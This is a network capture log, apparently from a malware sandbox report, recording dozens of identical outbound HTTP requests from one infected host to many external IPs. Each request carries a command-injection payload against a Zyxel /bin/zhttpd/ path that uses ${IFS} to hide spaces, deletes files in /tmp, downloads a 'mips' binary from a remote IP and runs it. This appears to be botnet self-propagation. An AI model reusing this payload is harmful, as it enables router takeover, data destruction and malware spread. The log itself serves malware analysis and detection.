                              Mar 31, 2024 08:41:12.630346060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2078192.168.2.1349552194.133.238.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630383968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2079192.168.2.1338016158.222.242.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630435944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2080192.168.2.135301274.145.232.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630490065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2081192.168.2.1360188217.35.7.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630495071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2082192.168.2.133858278.233.55.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630516052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2083192.168.2.1334512130.34.0.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630587101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2084192.168.2.1340978112.190.67.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630619049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2085192.168.2.133376472.101.114.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630652905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2086192.168.2.1348232189.203.141.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630701065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2087192.168.2.13357441.182.32.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630750895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2088192.168.2.135347451.161.177.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630796909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2089192.168.2.135134084.24.80.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630821943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2090192.168.2.135882483.29.115.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630847931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2091192.168.2.134963469.118.219.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630899906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2092192.168.2.1352256107.63.226.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630934954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2093192.168.2.135019848.34.174.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630960941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2094192.168.2.134200240.174.50.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.631028891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2095192.168.2.1338198203.3.25.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.631053925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2096192.168.2.1351620156.186.116.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.631097078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2097192.168.2.134250881.182.202.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.631151915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2098192.168.2.1359068111.185.120.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.631164074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2099192.168.2.1333808157.24.104.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631004095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2100192.168.2.135635094.61.182.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631130934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2101192.168.2.135159288.25.252.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631195068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2102192.168.2.1354056121.50.38.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631248951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2103192.168.2.1353650118.69.189.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631282091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2104192.168.2.134563852.233.148.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631339073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2105192.168.2.135018885.163.254.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631356001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2106192.168.2.1349344190.128.53.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631407022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2107192.168.2.1336474110.116.15.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631438017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2108192.168.2.134618889.11.198.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631503105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2109192.168.2.135039050.9.20.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631540060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2110192.168.2.1355602159.29.135.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631577969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2111192.168.2.133549899.33.182.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631633043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2112192.168.2.133406465.178.183.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631653070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2113192.168.2.1348364194.111.248.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631684065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2114192.168.2.135508476.44.182.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631733894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2115192.168.2.135972672.171.169.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631764889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2116192.168.2.1360550202.72.130.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631829023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2117192.168.2.1347860125.20.22.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631851912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2118192.168.2.134923694.180.124.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631906986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2119192.168.2.135113649.198.89.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631947041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2120192.168.2.1358250112.220.179.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.631978035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2121192.168.2.133738079.163.128.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632019997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2122192.168.2.135078639.195.207.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632050037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2123192.168.2.1341548115.182.233.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632108927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2124192.168.2.135887668.160.138.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632148027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2125192.168.2.1352764154.159.31.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632178068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2126192.168.2.1334304203.244.254.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632205963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2127192.168.2.1333526166.140.20.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632249117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2128192.168.2.1333186178.171.25.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632261992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2129192.168.2.1357628115.12.134.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632311106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2130192.168.2.1346320103.228.7.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632363081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2131192.168.2.1342366161.237.241.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632411003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2132192.168.2.135358246.222.78.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632431030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2133192.168.2.1333610204.158.143.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632467985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2134192.168.2.1356780120.224.140.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632514000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2135192.168.2.1336306150.133.137.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632554054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2136192.168.2.134408240.163.246.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632595062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2137192.168.2.1357120173.99.115.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632643938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2138192.168.2.1357878132.166.117.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632692099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2139192.168.2.1360524165.25.189.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632692099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2140192.168.2.134166891.23.69.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632745028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2141192.168.2.134808477.216.19.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632766008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2142192.168.2.1335706113.236.127.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632801056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2143192.168.2.1357122191.227.235.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632828951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2144192.168.2.1348778102.40.231.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632880926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2145192.168.2.133913451.200.128.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.632914066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2146192.168.2.135296641.111.32.62443
                              TimestampBytes transferredDirectionData
